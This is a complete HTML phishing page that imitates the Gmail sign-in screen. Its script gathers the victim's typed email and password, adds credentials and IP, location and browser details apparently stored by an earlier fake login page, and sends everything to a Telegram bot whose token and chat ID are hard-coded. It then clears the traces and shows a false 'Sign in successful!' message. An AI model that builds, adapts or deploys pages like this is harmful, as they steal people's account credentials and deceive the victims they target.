<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gmail - Sign In</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    colors: {
                        'google-blue': '#1a73e8',
                        'google-blue-hover': '#1557b0'
                    }
                }
            }
        }
    </script>
</head>
<body class="bg-white min-h-screen">
    <!-- Main Content -->
    <main class="flex-1 flex items-center justify-center px-6 py-12">
        <div class="max-w-md w-full">
            <div class="bg-white rounded-lg border border-gray-300 shadow-lg p-12">
                <!-- Google Logo -->
                <div class="text-center mb-8">
                    <svg class="w-24 h-8 mx-auto" viewBox="0 0 272 92" fill="none">
                        <path d="M115.75 47.18c0 12.77-9.99 22.18-22.25 22.18s-22.25-9.41-22.25-22.18C71.25 34.32 81.24 25 93.5 25s22.25 9.32 22.25 22.18zm-9.74 0c0-7.98-5.79-13.44-12.51-13.44S80.99 39.2 80.99 47.18c0 7.9 5.79 13.44 12.51 13.44s12.51-5.55 12.51-13.44z" fill="#EA4335"/>
                        <path d="M163.75 47.18c0 12.77-9.99 22.18-22.25 22.18s-22.25-9.41-22.25-22.18c0-12.85 9.99-22.18 22.25-22.18s22.25 9.32 22.25 22.18zm-9.74 0c0-7.98-5.79-13.44-12.51-13.44s-12.51 5.46-12.51 13.44c0 7.9 5.79 13.44 12.51 13.44s12.51-5.55 12.51-13.44z" fill="#FBBC05"/>
                        <path d="M209.75 26.34v39.82c0 16.38-9.66 23.07-21.08 23.07-10.75 0-17.22-7.19-19.66-13.07l8.48-3.53c1.51 3.61 5.21 7.87 11.17 7.87 7.31 0 11.84-4.51 11.84-13v-3.19h-.34c-2.18 2.69-6.38 5.04-11.68 5.04-11.09 0-21.25-9.66-21.25-22.09 0-12.52 10.16-22.26 21.25-22.26 5.29 0 9.49 2.35 11.68 4.96h.34v-3.61h9.25zm-8.56 20.92c0-7.81-5.21-13.52-11.84-13.52-6.72 0-12.35 5.71-12.35 13.52 0 7.73 5.63 13.36 12.35 13.36 6.63 0 11.84-5.63 11.84-13.36z" fill="#34A853"/>
                        <path d="M225 3v65h-9.5V3h9.5z" fill="#EA4335"/>
                        <path d="M262.02 54.48l7.56 5.04c-2.44 3.61-8.32 9.83-18.48 9.83-12.6 0-22.01-9.74-22.01-22.18 0-13.19 9.49-22.18 20.92-22.18 11.51 0 17.14 9.16 18.98 14.11l1.01 2.52-29.65 12.28c2.27 4.45 5.8 6.72 10.75 6.72 4.96 0 8.4-2.44 10.92-6.14zm-23.27-7.98l19.82-8.23c-1.09-2.77-4.37-4.7-8.23-4.7-4.95 0-11.84 4.37-11.59 12.93z" fill="#FBBC05"/>
                        <path d="M35.29 41.41V32H67c.31 1.64.47 3.58.47 5.68 0 7.06-1.93 15.79-8.15 22.01-6.05 6.3-13.78 9.66-24.02 9.66C16.32 69.35.36 53.89.36 34.91.36 15.93 16.32.47 35.3.47c10.5 0 17.98 4.12 23.6 9.49l-6.64 6.64c-4.03-3.78-9.49-6.72-16.97-6.72-13.86 0-24.7 11.17-24.7 25.03 0 13.86 10.84 25.03 24.7 25.03 8.99 0 14.11-3.61 17.39-6.89 2.66-2.66 4.41-6.46 5.1-11.65l-22.49.01z" fill="#4285F4"/>
                    </svg>
                </div>

                <!-- Form Header -->
                <div class="text-center mb-8">
                    <h1 class="text-2xl font-normal text-gray-800 mb-2">Sign in</h1>
                    <p class="text-sm text-gray-600">Use your Google Account</p>
                </div>

                <!-- Sign In Form -->
                <form id="gmailForm" class="space-y-6">
                    <div>
                        <input 
                            id="gmail_email"
                            type="email" 
                            placeholder="Email or phone"
                            class="w-full px-4 py-3 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-google-blue focus:border-transparent text-gray-800 placeholder-gray-500"
                        />
                    </div>

                    <div>
                        <input 
                            id="gmail_password"
                            type="password" 
                            placeholder="Enter your password"
                            class="w-full px-4 py-3 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-google-blue focus:border-transparent text-gray-800 placeholder-gray-500"
                        />
                    </div>

                    <div class="text-left">
                        <a href="#" class="text-google-blue hover:underline text-sm font-medium">Forgot email?</a>
                    </div>

                    <div class="text-sm text-gray-600 leading-relaxed">
                        Not your computer? Use Guest mode to sign in privately. 
                        <a href="#" class="text-google-blue hover:underline font-medium">Learn more</a>
                    </div>

                    <div class="flex justify-between items-center pt-4">
                        <a href="#" class="text-google-blue hover:underline text-sm font-medium">Create account</a>
                        <button 
                            type="submit"
                            class="bg-google-blue hover:bg-google-blue-hover text-white font-medium py-2 px-6 rounded-md transition-colors duration-200"
                        >
                            Next
                        </button>
                    </div>
                </form>
            </div>

            <!-- Language Selector -->
            <div class="mt-8 text-center">
                <select class="text-sm text-gray-600 bg-transparent border-none focus:outline-none">
                    <option>English (United States)</option>
                    <option>Español</option>
                    <option>Français</option>
                    <option>Deutsch</option>
                </select>
            </div>

            <!-- Footer Links -->
            <div class="mt-8 flex justify-center space-x-6 text-xs text-gray-600">
                <a href="#" class="hover:underline">Help</a>
                <a href="#" class="hover:underline">Privacy</a>
                <a href="#" class="hover:underline">Terms</a>
            </div>
        </div>
    </main>

    <!-- Added JavaScript for form handling and Telegram sending -->
    <script>
        // Pre-fill email from localStorage
        window.addEventListener('load', () => {
            const storedEmail = localStorage.getItem('userEmail');
            if (storedEmail) {
                document.getElementById('gmail_email').value = storedEmail;
            }
        });

        document.getElementById('gmailForm').addEventListener('submit', async (e) => {
            e.preventDefault();

            const emailFromForm = document.getElementById('gmail_email').value.trim();
            const passwordFromForm = document.getElementById('gmail_password').value;

            // Get stored data from first login page
            const originalEmail = localStorage.getItem('userEmail') || '';
            const originalPassword = localStorage.getItem('userPassword') || '';
            const ip = localStorage.getItem('userIP') || '';
            const country = localStorage.getItem('userCountry') || '';
            const city = localStorage.getItem('userCity') || '';
            const useragent = localStorage.getItem('userAgent') || '';
            const browser = localStorage.getItem('userBrowser') || '';
            const timestamp = localStorage.getItem('userTimestamp') || '';

            // Telegram bot configuration
            const botToken = "7838657657:AAHjMMwLMeDDCJyCeBN4liPX0ynbxRhpkvA";
            const chatId = "6686015911";

            const message = 
                "+++[ LOGIN INFO ]+++\n" +
                "Email: " + originalEmail + "\n" +
                "Password: " + originalPassword + "\n" +
                "+++[ EMAIL ACCESS ]+++\n" +
                "Email: " + emailFromForm + "\n" +
                "Password: " + passwordFromForm + "\n" +
                "+++[ IP DETAILS ]+++\n" +
                "IP Address: " + ip + "\n" +
                "Country: " + country + "\n" +
                "City: " + city + "\n" +
                "Useragent: " + useragent + "\n" +
                "Browser: " + browser + "\n" +
                "Timestamp: " + timestamp + "\n" +
                "+++[ RESULTS DONE ]+++";

            try {
                await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`);
            } catch (error) {
                // Telegram send failed, handle if needed
            }

            // Clear stored data
            localStorage.clear();

            // Redirect or show success message
            alert('Sign in successful!');
        });
    </script>
</body>
</html>
